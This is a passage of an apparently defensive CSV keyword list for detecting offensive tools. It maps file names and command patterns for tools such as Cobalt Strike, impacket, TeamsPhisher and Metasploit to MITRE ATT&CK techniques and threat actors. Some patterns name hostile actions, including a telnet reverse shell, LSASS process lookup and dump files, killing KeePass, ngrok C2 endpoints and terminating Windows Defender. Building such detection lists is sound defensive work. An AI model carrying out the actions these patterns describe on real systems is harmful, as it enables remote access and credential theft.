Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*targetedkerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*targetedkerberoast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*targetedKerberoast-main*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" +"*targetver.h*","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","454","142","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" +"*tarunkant/Gopherus*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*tas389.ps1*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*taskkill /F /T /IM keepass.exe /FI*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*tasklist /fi *Imagename eq lsass.exe* | find *lsass*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*tasklist /svc | findstr /i ""vmtoolsd.exe""*","greyware_tool_keyword","tasklist","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*TaskShell.exe * -b *.exe*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" +"*TaskShell.exe * -s *SYSTEM*","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","10","10","54","8","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z" +"*tastypepperoni/PPLBlade*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*tastypepperoni/RunAsWinTcb*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*tcp://0.tcp.ngrok.io:*","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*tcpClient.connectTCP(*127.0.0.1*1337*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" +"*tcpdump *","greyware_tool_keyword","tcpdump","A powerful command-line packet analyzer.and libpcap. a portable C/C++ library for network traffic capture","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","http://www.tcpdump.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*tcpreplay*","offensive_tool_keyword","tcpreplay","Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.","T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://tcpreplay.appneta.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*tcpshell.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*tdragon6/Supershell*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*teamserver* no_evasion.profile*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*teamServer*ZoomAPI.py*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" +"*TeamServer.C2Profiles*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*TeamServer.exe *github.com*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*TeamServer.prop*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*TeamServer/Filters/InjectionFilters*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*TeamServer/Pivots/*.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*TeamServer\TeamServer.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*TeamsPhisher.git*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamsphisher.log*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamsphisher.py*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*TeamsPhisher-main.zip*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*teamstracker-main*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*teamviewer_passwords.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*teamviewer_passwords.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*techspence/ScriptSentry*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*tecknicaltom/dsniff*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well)","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" +"*Teensypreter.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*telegram2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*TelegramRAT-main*","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","198","35","2023-08-25T13:41:49Z","2023-06-30T10:59:55Z" +"*telnet * | /bin/bash | telnet *","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*temp*\pp.exe*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","0","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" +"*temp*KillDefender*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*temp*lsass_*.dmp*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*temp*whoami.txt*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*Temp\dumpert*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*temp\stager.exe*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*templates*CSExec.cs*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*templates*HIPS_LIPS_processes.txt*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*templates*reflective_assembly_minified.ps1*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10",,"N/A",,, +"*tenable.com/downloads/nessus*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Terminating Windows Defender?*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*test.endpoint.rapid7.com*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*test_beef_debugs_spec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*test_ccache_fromKirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*test_crawler.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*test_invoke_bof.x64.o*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" +"*test_litefuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" 